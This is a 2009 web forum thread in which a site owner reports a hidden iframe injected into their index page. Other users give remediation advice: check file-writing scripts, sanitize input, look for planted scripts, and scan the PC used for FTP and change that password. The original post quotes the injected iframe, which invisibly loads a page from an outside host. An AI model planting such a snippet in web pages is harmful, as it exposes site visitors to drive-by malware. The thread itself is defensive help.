Page 1 of 1

code injection

Posted: Sat Jul 11, 2009 3:12 am
by itsmani1
some how following code gets inject to my index page. what should I do to stop it?
<iframe src="http://u3w.ru:8080/index.php" width=123 height=130 style="visibility: hidden"></iframe>

Re: code injection

Posted: Sat Jul 11, 2009 12:43 pm
by McInfo
Inform your server administrator that the server is insecure.

Edit: This post was recovered from search engine cache.

Re: code injection

Posted: Mon Jul 13, 2009 1:58 am
by itsmani1
thanks for the reply

anything that should be done at my end?

Re: code injection

Posted: Mon Jul 13, 2009 11:57 am
by McInfo
Find the source of the HTML. If it is embedded in the index.php file, look through your scripts and make sure there aren't any that allow a user to modify files. If the iframe is generated dynamically, such as from data stored in a database, make sure all of your scripts sanitize incoming user data.

If you are on a shared-hosting server, it is likely that the attack came from someone you share the server with. That is why I suggested that you inform your server administrator. If they can't do anything for you, move to a more secure host.

Edit: This post was recovered from search engine cache.

Re: code injection

Posted: Mon Jul 13, 2009 2:45 pm
by Reviresco
Look through all your directories -- there is probably a malicious script hidden there somewhere that you didn't put there. Start with images folders.

Re: code injection

Posted: Tue Jul 14, 2009 12:25 am
by joshj
i faced same problem earlier, i searched a lot and found that...it is some miscellaneous script that can automatically connect to your ftp and insert this code into all the index file hosted on root server.

I strongly recommend to scan your PC (from which you are connecting ftp), and change your ftp password. if you will not remove this script that Google will consider your website as a attack site and will remove from their index.

hope this will work,